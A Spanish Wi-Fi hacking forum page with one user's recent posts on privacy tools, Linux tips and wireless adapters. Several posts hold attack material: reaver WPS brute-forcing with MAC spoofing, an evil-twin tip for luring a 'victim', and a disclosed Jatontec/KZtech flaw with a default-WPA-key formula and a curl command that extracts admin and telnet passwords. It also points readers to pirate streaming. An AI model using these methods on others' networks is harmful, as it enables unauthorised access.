El libre pensamiento para un internet libre

No estas registrado.  

#1 Cañas y tapas » Q: En el ojo de la tormenta » 18-04-2021 13:15:11

kcdtv
Respuestas: 0
Q: En el ojo de la tormenta

proxy-image.jpeg

Si [email protected] nunca habían oído hablar de Qanon, la tomada del capitolio despuès las elecciones presidenciales en EEUU ha puesto bajo todos los focos mediáticos al mundillo del "Q".
Qanon usa las mismas viejas recetas (satanismo, comer/sacrificar bebés) que se han usado desde la edad media, especialmente contra los judios.
  Si la moda del Q nunca ha desplegado en Europa, hemos visto que en EEUU ha llegado a ser "algo": Hay actualmente dos disputados republicanos elegidos que se presentan como adeptas de las "drops" anónimas.
  Es muy probable que pase de moda rápido pero vendrá otra "teoría" del palo. 
El Q no es algo nuevo, ni es históricamente especialmente impactante, más allá de un intento fallido de "golpe de estado" que ni lo es. Los protocolos de los sabios de Sion y otras delicias del palo han tenido mucho más daño que el Q.
   
  Si no sabes que hacer este domingo puedes divertirte viendo el documental en 6 partes "Q, en el ojo de la tormenta"

Primero porque el investigador ha seguido el fenómeno desde el inicio y ha ido hasta las fuentes para descubrir quien es Q,
Esto es fundamental, porque no hubiera obtenido lo que ha obtenido sin crear ciertos vínculos de confianza con los protagonistas. 
  No voy a hacer spoiling pero al final tendréis la respuesta... No con una declaración contundente "Yo soy Q y lo voy a demostrar", pero a lo largo de cuatros años de investigación y muchas entrevistas, uno acaba contradiciendo varias veces y acaba cometiendo inevitablemente errores hasta que se la vaya claramente la lengua.
 
  Cómo bien decía Lincoln "Nadie tiene la memoria suficiente para mentir siempre con éxito.
 
  Veréis de cerca a algunos personajes claves de las cloacas del internet americano, de 4chan pasando por 8chan hasta 8kun.
  Es cómo "foro coches" de aquí pero aún más loco... Es America: Siempre hacen las cosas a lo grande.
  Lo que los pioneros de la web establecieron, la necesidad de un "netiqueta", queda más que obvio tras visionar este documental.
  Un administrador de foro no puede limpiarse las manos sin más. Lo que se publica en su foro es también responsabilidad suya (me plazo desde una perspectiva ética). 
   La libertad no existe si no hay un mínimo de respeto. Y los enemigos de la libertad son los primeros en abusar de ella.     

  Para ver el documental, una producción HBO, podéis hacerlo legalmente sin desembolsar un €uro con la oferta "7 días de prueba" HBO.
Creáis una cuenta y la cerráis antes de que pasen 7 días. De lo contrario se les cobrará 9 € para pagar un mes de acceso más a HBO.

  Está también disponible en otras plataforma de streaming
  Sí no queréis crear cuenta HBO o no tenéis cuenta en plataforma tipo amazon, acudir a vuestra web streaming pirata de confianza, está ya por todos lados...  big_smile

#2 Re: Las herramientas para WPS » Documentación y soporte para reaver 1.6.1 y versiones posteriores » 18-04-2021 12:28:47

Nueva opción "Mac Changer"

  Se ha introducido una nueva opción en reaver: -M
Con esta opción reaver cambiará automáticamente los 6 últimos dígitos de nuestra dirección Mac a cada intento.
La opción no está habilitada por defecto y tendremos que emplear su argumento en la linea de comando reaver para activarla.

-M, --mac-changer Change the last digit of the MAC Address for each pin attempt [False]

 
Ejemplo

sudo reaver -i wlan0mon -b 12:34:56:78:90:FF -vv -M

  Cómo siempre, debéis descargar (clonear) la ultima revisión desde github para usar esta nueva opción.

#3 Wireless, Internet y Redes » Want My RSS: Complemento perfecto para seguir siguiendo los flujos RSS » 14-04-2021 11:27:29

kcdtv
Respuestas: 0
Want My RSS: Complemento perfecto para seguir siguiendo los flujos RSS

giphy.gif

  El RSS es un formato heredado de unos tiempos muy, muy lejanos, cuando facebook y whatsap no existían, 
Estaba muy apreciado en los primeros foros porque era la forma idónea para leer a los últimos mensajes publicado sin que importe la categoría, gastando un mínimo de ancho de banda gracias a una simplificación estilística. 
Gracias a los "aggregadores" podías crear tu flujo a medida y seguir varios foros simultáneamente de forma  rápida y sencilla. 
Hablamos de conexiones a 54kbps y PC con algunos MB de RAM...
  Sin embargo los navegadores han dejado de dar soporte al RSS considerado como obsoleto y poco vistoso.   
Si haces clic en "Flujo RSS" arriba en tu foro favorito (wifi-libre) accederás a un código fuente XML "poco" practico:

rss_1.jpg

¡Qué pena!

  Afortunadamente tenemos al complemento  Want My RSS de Mikhail Vyrtsev
Se instala, el complemento trabaja en segundo plano (nada en tu barra de complemento) y funciona al instante cuando hacemos clic en un flujo RSS.

rss_2.jpg

  Discreción absoluta para tener a toda le velocidad y la sencillez del RSS cómo en aquellos viejos tiempos.
Fuentes

#4 Seguridad y Hacking ético » Averigua si estás fichado por Google mediante FLoC » 13-04-2021 13:10:59

kcdtv
Respuestas: 0
Averigua si estás fichado por Google mediante FLoC y toma las medidas adecuadas

floc-4b.gif

  Es por las cookies que Google rastrea habitualmente a los internautas y maximiza sus ingresos estableciendo perfiles precisos.
El problema para google es que la Legislación Europea sobre protección de datos obliga los sitios web a advertir del uso de cookies y deben permitir rechazarlos de forma sencilla.   
La Union Europea ha de hecho advertido de que iba a ser más exigente sobre la opción para rechazar cookies ya que muchos sitios complican las cosas: Demasiadas veces el usuario debe rechazar cada cookies individualmente en una lista más larga que un brazo.
  Esto hace que el usuario acepta todo para visitar el sitio y la UE ha dicho ¡Basta!   
Los sitios deben incluir una opción "de un solo clic" para rechazar todas las cookies de terceros que sirven para rastreo con fines publicitarias.
  Muchos navegadores web han también puesto de pie una política de rechazo más fuerte por defecto.
  Sin hablar de los plug-in y complementos tipo Ublock que están muy de moda (con razón)

  Para seguir rastreando los internautas, Google está cambiando de enfoque utilizando el FLoC (Federated Learning of Cohorts)
Se trata de identificar y rastrear un usuario sin pasar por los cookies, examinando otras huellas, la configuración hardware/software, los plug-in instalados, los centros de interés, el histórico del navegador...

Federated Learning Component
The FLoC (Federated Learning of Cohorts) project aims to group users based on their browsing habits in a privacy preserving way, that would allow interest-based advertising without exposing a user’s browsing history.

This component contains data types (e.g. FlocID) that other layers could access (e.g. chrome/browser, services/network).

federated_learning @ Chromium Code Search
Se está ahora mismo experimentado con los usuarios de la ultima versión de chrome en varios países (España no de momento) para hacer más precisos los algoritmos del rastreo sin cookies. 
Google genera lo que llama un simhash de vuestro navegador para situarlos en uno de los 33 000 grupos iniciales que ha creado para clasificar la población.
   Más tiempo pasará y más grupos habrán, si tienes gustos peculiares acabarás rápido solo en un grupo, en fin, el grupo serás tú...

   Para saber si eres uno de los conejos de la India de google, visita el sitio de la EFF:

  Si es el caso tienes dos opciones:

  1. Dejar de usar Chrome de una <censured> vez. Inútil recordar que firefox es muy distinto en todos aspectos ya que tiene su propio motor de renderizado. Si quieres seguir con un navegador basado en blink (el motor de chrome) hay muchas opciones muy chulas. Por ejemplo Vivaldi, que además va mejor que chrome y es más guapo

  2. Ir a la configuración de Chrome y rechazar permanentemente todas las cookies

Fuentes

#5 Softwares libres en sistemas no libres » 1.1.1.1 WARP: La aplicación gratis contra el rastreo de Cloudflare » 12-04-2021 11:37:35

kcdtv
Respuestas: 0
1.1.1.1 WARP: La aplicación gratis contra el rastreo de Cloudflare

1.1.1.1-Screen-Record.gif

Hace dos años atrás que Clouflare ha lanzado un programa enfocado a privacidad bastante innovador y interesante: 1.1.1.1 WARP.
Se puede optar por una versión de pago - WARP+ (más velocidad) - pero la versión gratis funciona bien y ofrece lo mismo a nivel de seguridad.
   ¿Qué es WARP?
WARP es más o menos igual que un VPN (de los buenos) desde un punto de vista seguridad.
   La diferencia con los VPN gratis es que no hay limites de datos.
  Otra diferencia es que no elegimos un país de salida, nuestra IP será una de cloudflare cerca de nuestra verdadera localización.
    Dicho de otro modo no vale para eludir los bloqueos regionales, vale para nuestro anonimato.
   
La aplicación 1.1.1.1 permite dos configuraciones:

  • Anonimato "parcial": No cambiamos de IP (guardamos toda la velocidad de nuestra conexión) pero pasamos por los DNS 1.1.1.1 de cloudflare con el https sobre DNS habilitado. Esto  tapa el agujero negro de seguridad de las peticiones DNS hechas en texto plano. Nuestro ISP o un atacante no pueden saber que sitios visitamos esnifando nuestro trafico.

  • Anonimato "completo": Es cómo usar un VPN, cambiamos de IP, no se sabe que sitios visitamos ni dónde/quien somos

warp_4.jpg

La ventaja con WARP y su aplicación 1.1.1.1  es que usamos los excelentes servicios de Clouflare:

  • El mejor DNS del mercado,

  • Servidores potentes,

  • Política sobre privacidad impecable con cifrado end-to-end en todos momentos,

  • Beneficiamos de las innovaciones propias de cloudflare como el DoH

Podéis ver en la captura de pantalla que sigue un resultado de un test de velocidad efectuado utilizando todo el escudo de protección WARP desde un móvil Android conectado a mi router

warp_1.jpg

Otra prueba con el mismo movíl en el mismo sitio pero esta vez sin usar nada

warp_3.jpg

Unos resultados muy cercanos, no despreciamos mucho ancho de banda, por ser un VPN gratis son resultados muy que muy buenos.

  En conclusión diría que WARP con su aplicación 1.1.1.1 para Android es la mejor solución gratis para impedir su rastreo sin desembolsar un duro y sin sacrificar nuetsra velocidad .
Teniendo siempre en mente que el anonimato completo y a prueba de bala es imposible con un teléfono Android debido a Android mismo.
WARP está disponible para Android, mac y windows.
Y está en los planes de cloudflare de crear una versión para distribuciones Linux.
Para más información visiten:

#6 Re: Seguridad y Hacking ético » Wifi un solo pago » 12-04-2021 09:31:35

Quizá sea una reminiscencia de esto: (Duda) Infinitum 2.4
En este caso parecía que eran empleados de Telmex o bien piratas que se habían hecho con credenciales de alguien importante dentro de telmex; alguien con bastante privilegios para configurar remotamente a las redes y acceder a los credenciales.
Podrías probar con tu red y ver que pasa, ya que el pago se hace despuès obtener la llave, si no pagas cambian la contraseña WPA y ponen un mensaje de advertencia en lugar del eSSID. Accedes por cable y cambias el eSSID y contraseña WPA, sabrás así sí es un fake o algo real.
¡[email protected] @ wifi-libre! smile

#7 Asesoramiento sistemas Linux » Montar una live en un USB mediante linea de comandos » 08-04-2021 11:19:07

kcdtv
Respuestas: 0
Montar una live en un USB mediante linea de comandos

giphy.gif

Hace poco he tenido que ayudar a una amiga que necesitaba reinstalar el Windows.
Intenté entonces crear un USB con windows 10 para instalación,
He usado el programa woeUSB que solía funcionar muy bien pero no he logrado instalarlo correctamente por una librería rebelde. hmm 
Hay varias utilidades que funcionan muy bien para montar live USB (por ejemplo Etcher) pero no he visto a ninguna que sea compatible con Windows.
Lo bueno con estos programas es que no tenemos que pensar, todo se hace con dos clics y son seguros: No borran los discos duros, solo formatean la llave USB.
Dicho esto no es nada complicado montar una live USB en linea de comando.
Vamos a ver [email protected] cómo crear una live USB con nuestras manitas.

  Lo más rápido y directo  es con el potente comando dd. 
Pero no es a prueba de balas, con windows 10 (y otras distribuciones GNU-Linux) no me ha funcionado.
Quizá sea por la redacción de la linea de comandos, hay varios parámetros posibles.
La cosa es que es algo lento ya que formatea al vuelo la memoria USB y podemos tirarnos un buen rato probando varias sintaxis sin lograrlo.

  Así que es probablemente preferible hacerlo así:

  1. Descargamos el sistema operativo

  2. Creamos un directorio para montar la live. Puede ser dónde sea. Insisto en ello porque en muchos tutoriales lo hacen en la partición root y no hay porque. Yo lo hago en el Escritorio para simplificarme la vida y arrastrar fácilmente las carpetas en mi consola (para no tener que entrar las rutas)

    mkdir ~/Escritorio/live

  3. Montamos la live en la carpeta recién creada, ejemplo:

    sudo mount -o loop '/home/kcdtv/Descargas/Win10_20H2_v2_Dutch_x64.iso' ~/Escritorio/live

    Si mirras en el directorio "live" puedes ver que la ISO está descomprimida. Se podría descomprimir ahí en lugar de montarla y podría funcionar, pero no siempre (con windows no) así que montarla es más seguro

  4. Enchufamos el stick y lo formateamos en FAT32 (más "universal"). Recomiendo usar la GUI de gparted. Pero si lo quereís hacer todo en linea de comando sería así:

    • Averiguamos el "nombre" del stick con

      lsblk

      Si tienes un solo disco duro y has enchufado un solo stick será automáticamente sdb

    • Desmontamos el stick.

      sudo umount /dev/sdb1
    • Lo formateamos en FAT32 con

      sudo mkfs.vfat /dev/sdb1
    • Desenchufamos y volvemos a enchufar el stick para montarlo todo limpito

  5. Tenemos al stick fomateado en FAT32, tenemos a la live montada en el Escritorio, ahora solo queda copiar la live en el stick:

    sudo cp -r ~/Escritorio/live/* /media/kcdtv/A177-C4CF/ 

    Para tener la ruta hacía el stick (/media/kcdtv/A177-C4CF/ en el ejemplo) simplemente arrastres el icono del stick que aparece en escritorio en la consola

  6. Tu live está creada y lista para uso, para dejarlo todo niquelado, desmontas la live del escritorio

    sudo umount ~/Escritorio/live
  7. Y borras el punto de montaje

    rm -r ~/Escritorio/live
  8. Puedes reiniciar tu ordenador para usar tu live

    sudo systemctl reboot

Cómo podéis ver es simple, la lógica a seguir es de tres pasos:

  • Montar la live en el sistema

  • Formatear el stick

  • Copiar lo que hemos montado en el stick

Acabo de probar con un par de cosas para windows (el propio windows, des-bloqueador de contraseñas windows) y funciona perfectamente así. También podemos montar así una imagen IOS
Así que es un método muy útil ya que los programas para hacer live desde Linux están enfocados a linux y es probable que no tengan soporte para cosas windows o mac.
Y podemos también perfectamente montar una live linux de este modo.

#8 Re: Wireless y redes en linux. » ayuda con rtl8811cu » 05-04-2021 07:56:48

Si tienes el M1 y el M2, por ejemplo en una livebox, es que reaver funciona corectamente. Luego el router te rechaza y es normal: Para sacar el PIN hace falta que el WPS este activado y habilitado del todo...Orange y Movistar han actualizado sus firmwares y el modo PIN está deshabilitado por defecto. No puedes activarlo manualmente desde la interfaz, por lo menos en las livebox, si haces clic en la opción, simplemente no responde. A lo mejor se podría conseguir haciendo trampa pero la GUI no te deja.

#9 Re: Antenas omnidireccionales » ¿Habéis visto que adaptador tan raro ha sacado Comfast? » 05-04-2021 07:45:16

La idea es interesante para un dispositivo ac1200 MIMO 4T4R pero los cables miden 1.2 metros y lo veo un pelín corto, no te da mucha libertad de movimiento. Con 2-3 metros sería más lo suyo en mi opinión. Si por ejemplo es para una tarjeta PCI en un PC de sobre mesa que está en el suelo (cómo yo big_smile ), con 1m20 llegas al borde de la mesa y poco más.

#10 Re: Wireless y redes en linux. » ayuda con rtl8811cu » 02-04-2021 10:31:54

¡Bien hecho! biere
Así es perfectamente funcional. smile
No que sea un experto pero un pequeño consejo para tomar buenos hábitos y es un consejo que encontraras en todas las guías: Es mejor no usar && en los scripts pero poner una orden por linea.
O sea redactarlo así:

#!/bin/bash

/etc/rc.d/rc.networkmanager stop 
ip link set wlan0 down 
iw wlan0 set monitor control 
ip link set wlan0 up 
iw dev

No es necesario usar &&: El interprete de ordenes ejecuta todas las ordenes que pones en tu script de forma secuencial de arriba hasta abajo.   
Si pones && y que una de tus ordenes falla no se ejecutará ninguna.
La ejecución es más lenta, se desgastan más recursos: En lugar de ejecutar una linea y luego otra, el interprete tiene que ir hasta el final de tu script para luego volver atrás y ejecutar los ordenes una despuès otra. 
En este caso son 4 ordenes cortas y no es importante.
Pero el día que empiezas a hacer scripts más largos va a ser un lió y notarás la diferencia.
Además con una orden por linea te simplificas el "debugging": Verás de inmediato dónde esta el error (bash te dice linea que falla) y te será mucho más fácíl arreglarlo. wink

#11 Re: Wireless y redes en linux. » Nuevo driver para rtl8814au (awus1900) con soporte modo monitor » 02-04-2021 09:57:04

@skan
Creo que hay incluso utilidades en tu distribución para crear el xzm a golpes de clic,.. Lo que sí tengo claro es que hay cienes de tutoriales para hacerte tus paquetes xzm. Es cuestión de leer la documentación de slackware o bien ir en seguridad wireless y buscar un poco.
  Tampoco es muy complicado hacerse una partición y hacer un dual boot (o borrar el windows y pasarse a linux. sin dudas la mejor opción big_smile ),
Ya no estamos en los años 2000, los discos tienen espacio de sobra si te organizas un poco.
Si quieres usar tu distribución desde un stick USB tienes la opción de instalar el sistema en el USB en lugar de usarlo en modo live.
El modo live es antes de todo para probar y instalar un sistema, no para usarlo cómo sistema instalado,
Y si es para tí una cuestión de principios despreciar recursos con el modo live puedes bajarte el repositorio en tu disco duro windows y accedes a el desde tu live, compilas una vez y lo tienes listo para copiarlo y pegarlo en el directorio adecuado las veces que quieres.
Puedes incluso hacer un "script" de una linea con cp que pones en /etc/init para que sea automático al arrancar la live.
Pero bueno, cómo bien dice sol666, hacerse un xzm no es complicado.

#12 Re: Wireless y redes en linux. » ayuda con rtl8811cu » 01-04-2021 15:52:15

Gracias por los links smile
airmon-ng check kill es para eliminar de forma segura a todos los procesos conflictivos.
Si apagas Network-Manager es generalmente suficiente.
Y es normal que airodump-ng mire en una sola banda, es lo que hace por defecto.
Parece que tienes justamente al netwrok manager activo lo que hace que va en las dos bandas.
Ojo que te va a dar problemas cuando vas a inyectar,
Lo suyo es detener network manager y usar la opción -b a de airodump-ng para ir en la banda 5G
Si quieres escanear en las dos bandas sería con -b ag

#13 Re: Wireless y redes en linux. » ayuda con rtl8811cu » 01-04-2021 11:12:13

¿Para 4 €uros? Interesante... A lo mejor me pillo uno para trastear. ¿Podrías poner las referencias?

¿cual es la manera correcta de ponerla en modo monitor y volver a managed?creo que con airmon-ng no se podia por lo que he leido.

Tienes la guía en el fichero Monitor_Mode.md del repositorio: Monitor_Mode.md
Debes bajar la interfaz y luego haces

sudo iw <interfaz> set monitor control

(primera vez que lo veo de este modo)
Levantas la interfaz y listo.
Y para deshabilitar el modo monitor, bajas la interfaz y haces

sudo iw <inetrfaz> set type managed

(esto ya es "cómo siempre" con iw)
Y luego la subes otra vez.
Mira la guía y prueba, sí tienes problemas vuelve por aquí y miraremos esto.

#14 Re: Wireless y redes en linux. » ayuda con rtl8811cu » 31-03-2021 13:47:25

El driver de brektrou es más moderno, debería lógicamente irte mejor.
Y este es aún más reciente: morrownr / 8821cu

Linux Driver for USB WiFi Adapters that are based on the RTL8811CU, RTL8821CU and RTL8731AU Chipsets

    v5.8.1.7 (Realtek) (2020-09-29)

#15 Re: Configuración y optimización » Ayuda con bam 3g Digitel (Huawei e177-u) instalación » 23-03-2021 19:36:12

¿Una foto de un script? big_smile
Un fichero texto no se fotografía: Se copia y pega empleando la opción "texto formateado" para que quede practico y bonito.
Debes aprender cómo funcionar en un foro... tus mensajes son casi vacíos, no proporcionas información, links.... Si harías las cosas como debido todo estaría dicho en un mensaje y ya tendríamos el fichero para mirarlo. wink

#16 Re: TP-Link » Tarjeta Yo Link » 23-03-2021 16:18:23

Por favor, antes de abrir un tema nuevo busca en el foro porque hay varios temas dónde se dan consejos para compra de tarjeta TP-Link barata,
Luego haz títulos descriptivos.... "Yo Link" = wtf? big_smile
Tema cerrado.

#17 Re: Configuración y optimización » Ayuda con bam 3g Digitel (Huawei e177-u) instalación » 23-03-2021 16:14:28

Para instalar algo necesitas privilegios de administrador (sudo o su) 
Enseña el script.

#18 Estudio de algoritmos y búsqueda de la nueva brecha » Crack WPA instantáneo en dispositivos CPE KZtech y Jatontec » 22-03-2021 15:03:03

kcdtv
Respuestas: 0
Terrible configuración WPA por defecto en varios CPE de Jatontec y KZtech

giphy.gif

  Los fabricantes Jatontec

jatontec_1.jpg

y KZtech

jatontec_2.jpg

son especialistas en "outdoor CPE"
Es decir unos Puntos de Acceso/repetidores con antena integrada y diseñado para estar en exteriores - con un enfoque marcado en los productos que combinan WiFi y 3/4/5g.
  Unos dispositivos que suelen estar algo caro por naturaleza...

Dos empresas que hacen concurrencia al conocido fabricante Ubiquiti (o Mirkotic) y que intentan jugar en la misma categoría.
   La cosa es que no basta con montar unos buenos hardware.
Lo que hace el éxito de Ubiquiti o Mikrotic es también su firmware.
  Hablamos en estos casos de auténticos Sistema Operativos  de código abierto con un nivel máximo de seguridad y eficiencia. 
Además se proporciona así una libertad total a los usuarios y un soporte "de por vida".

  Sin embargo los firmwares de los dispositivos Jatonteh y KZtech incriminados son una autentica catástrofe (para no decir algo más vulgar).

La llave WPA por defecto se forma con los 8 últimos dígitos de la dirección mac ethernet del dispositivo
Example defaults:

# ifconfig |grep HWaddr
br0       Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
br0:9     Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
eth2      Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
eth2.1    Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
eth2.100  Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
eth2.1000 Link encap:Ethernet  HWaddr 6C:AD:EF:16:7C:5D
eth2.2    Link encap:Ethernet  HWaddr 6C:AD:EF:FF:00:01
ra0       Link encap:Ethernet  HWaddr 6C:AD:EF:5D:7C:5C
rai0      Link encap:Ethernet  HWaddr 6C:AD:EF:5E:7C:5C

SSID1=MyWiFi-167C5D
SSID1=MyWiFi-5G-167C5D

WiFi password = EF167C5D

  Esta dirección mac ethernet se usa para el formar el eSSID
Cómo bien sabéis los 6 primeros dígitos (el OUI) de una dirección mac no cambian
Así que para encontrar la llave WPA solo tenemos que escanear:

  • Pillamos los dígitos 5 y 6 del bSSID ( 6C:AD:EF:5E:7C:5C)

  • Añadimos los 6 dígitos hexadecimales del final del eSSID MyWiFi-167C5D

  • Ya tenemos a la llave WPA: EF167C5D

Una configuración digna de los ISP españoles en los años 2000, ya sabes, cuando el wifi era un servicio publico gratis big_smile tongue

  Esta brecha no es un drama ya que un essid y una llave WPA se pueden modificar.
Pero el/la/los investigador(es) LiquidWorm ha(n) descubierto muchas más... Podemos por ejemplo obtener la contraseña de administrador muy fácilmente, solo hay que descargar la configuración llamando a cgi-bin...

$ curl -s \
       -o configtest.zlib \ # Default: config.dat
       'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \
       binwalk -e configtest.zlib ; \
       cd _configtest.zlib_extracted ; \
       strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \
       # cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device
       cd ..

3:Login=admin
4:Password=neotelwings
5:TelnetPwd=root123
6:GuestId=user
7:GuestPassword=user123
89:DDNSPassword=
239:auto_update_password=
279:Tr069_Password=
288:Tr069_ConnectionRequestPassword=admin
300:Tr069_STUNPassword=
339:telnetManagement=2
$

Hay también unos credenciales admin de la consola linux de los dispositivos que son  "hardcoded", no se pueden re-configurar...
  Felicidades a los investigadores de Macedonia por su trabajo
Fuentes

#19 Re: Estudio de algoritmos y búsqueda de la nueva brecha » Crack llave WPA Arris TG2482A(y otros modelos) » 17-03-2021 19:58:03

¡[email protected] @ wifi-libre HumbertoML! biere
   Otro gran algoritmo por parte de Arris (Generador Crippled para modelos de marca Belkin, Ubee y Arris-Motorola)... big_smile
   Muchas gracias por el aporte smile

edit

Buscando por la red obtengo datos que no coinciden.
¿Te molestaría subir una foto de la pegatina o una captura de pantalla de la configuración?
Lo que he encontrado es esto:

TG24842A_1.jpg

La llave WPA por defecto se hace con los 12 últimos dígitos del numeró de serie
Así que:

  • Si se usan siempre las letras mayúsculas NB es factible

  • Si las letras cambian de un dispositivo a otro ya no es factible

Quizá se ha cambiado el patrón, quizá se debe al ISP...
Se agradecería que nos diera la versión de hardware-firmware y el ISP (lo mejor sería ver la etiqueta) para precisar todo esto smile


edit 2
Aquí la llave WPA es la mac (parece que sea el bSSID, ponen CMAC... podría ser la mac ethrent (C=¿Cable?)
TG24842A_2.jpg
Bueno. en todos casos, vale la pena probar el método que expusiste o poner la mac directo y probar manipulando los 2 últimos dígitos ....
Gracias otra vez por tu aporte,. smile

edit 3
No pongas IZZI-XXXX en el titulo (lo he vuelto a quitar) ya que das a pensar que se trata de un patrón de eSSID por defecto y no es el caso. wink

#20 Re: Wireless, Internet y Redes » about:config - Comparte tus mejores trucos para firefox » 17-03-2021 13:48:52

Firefox ha lanzado a proton, una nueva interfaz.
A nivel gráfico la nueva interfaz no cambia mucho el panorama.
Lo interesante es que mejora la velocidad al arrancar o cerrar el navegador
Para habilitar Proton debemos poner en true a 3 parámetros:

    browser.proton.tabs.enabled
    browser.proton.appmenu.enabled
    browser.newtabpage.activity-stream.newNewtabExperience.enabled

fuente

#21 Re: Hacking wireless ético: Los métodos alternativos » Crack WPA sin fuerza bruta con el nuevo menú "Evil Twin" de airgeddon » 16-03-2021 14:15:26

Bienvenido al foro babyhackgangster. biere
Lo que describes es normal. el dispositivo con nivel de señal más alta sale primero en le gestor de redes.
Puedes usar un antena con mayor ganancia y/o subir la potencia en salida para darle más fuerza a la señal de tu punto de acceso trampa y facilitar así su detección por el cliente "victima"

#22 Re: TP-Link » Conectarme a internet con TPLink TL WR741ND o WR841N » 16-03-2021 14:03:12

Buenos días Walterb smile
He mirado el emulador del TL- WR741ND y lo que veo es que la única opción que tienes para conectarte mediante wifi al router fuente es usar el WDS
Es importante configurar tu router en el mismo canal que el router fuente.
Y obviamente poner la llave con el cifrado correcto, poner la mac correcta y el essid adecuado,
Luego hay que elegir un dirección IP (local) concorde con la configuración del router fuente
El gran problema con el WDS es que no hay garantía que funcione, incluso utilizando routers del mismo fabricante.
No es lo mismo que un repetidor, no puedes configurar tu dhcpd en otro rango en tu red wifi, no puedes poner otra llave, no tienes NAT... Es un puente.
Asegúrate de bien configurar todo correctamente (ver Cómo configurar la función WDS en los routers inalámbricos TP-Link (IU Verde)
Si has hecho todo como debido y que no funciona no es "tu culpa", es que los dispositivos no pueden funcionar juntos en modo WDS, hmm
Puedes probar instalar DD-WRT, un firmware alternativo open source, pero no se recomienda debido a la falta de memoria "ROM": openWRT TP-Link TL-WR741ND
Hay también muchos modelos baratos que sí son repetidores. Yo por ejemplo he usado durante años un totolink 301N que daba muy buenos resultados y costaba 20-30€uros,
De segunda mano deberías encontrar algo similar para menos.

#23 Re: Presentaciones » Hola » 15-03-2021 15:06:10

Un placer tenerte a bordo, ¡[email protected] @ wifi-libre! biere.

#24 Re: TP-Link » Conectarme a internet con TPLink TL WR741ND o WR841N » 14-03-2021 16:23:44

¡Bienvenido al foro Walterb!
Los pasos a seguir para usar tu router como repetidor wifi son fáciles y solo tienes que seguir tu manual. No vamos a explicarlos aquí y hacer otro manual, primero pruebas y si no lo consigues haz una pregunta precisa sobre el paso que no te sale.
Aquí tienes los pasos: How to configure Repeater mode of the Wireless N Access Point (new logo)?
Y además tienes a simuladores en su página para probar: simuladores Interfaces TP-Link

Lo importante en este asunto, si quieres tener wifi en casa, es pillar un modelo cuyo chipset wifi es compatible con la virtualización de interfaces para poder usarlo de repetidor WiFi
Y esto en la fraseología de TP-Link se llama "Universal repeater" o "repetidor universal" en castellano.

tplinkrepeater_1.jpg

 
Ninguno de los modelos que propones es compatible con dicho modo
Te puedes conectar por wifi al router de tu vecino usándolo en modo cliente (como todos los routers) pero no podrás repetir la señal wifi, solo te podrás conectar mediante cable.
Un modelo compatible sería el TL-WA901ND  o el TL-WA801N
Lo importante es que tengas claramente escrito que es compatible con el modo repetidor universal, si no lo ponen es que no lo es (compatible)

#25 Re: Wireless y redes en linux. » Nuevo driver para rtl8814au (awus1900) con soporte modo monitor » 14-03-2021 15:43:45

Hola susanita smile
WoW, esto si que es una buena noticia. plus_un
Voy a probarlos de inmediato en un SO instalado y comentaré algo.
¡Muchísimas gracias!  biere

edit

¡Qué grande susanita! cool
La inyección funciona a full con estos drivers.
He obtenido el handshake enseguida smile

awus1900newdrivers.jpg

Reaver funciona también.
Otra vez muchísimas gracias smile

Pie de página

Información del usuario

Ultimo usuario registrado: pelosuelto
Usuarios registrados conectados: 0
Invitados conectados: 4

Estadisticas de los foros

Número total de usuarios registrados: 2,155
Número total de temas: 1,521
Número total de mensajes: 14,721

Máx. usuarios conectados: 373 el 30-09-2019 15:04:36
Impulsado por FluxBB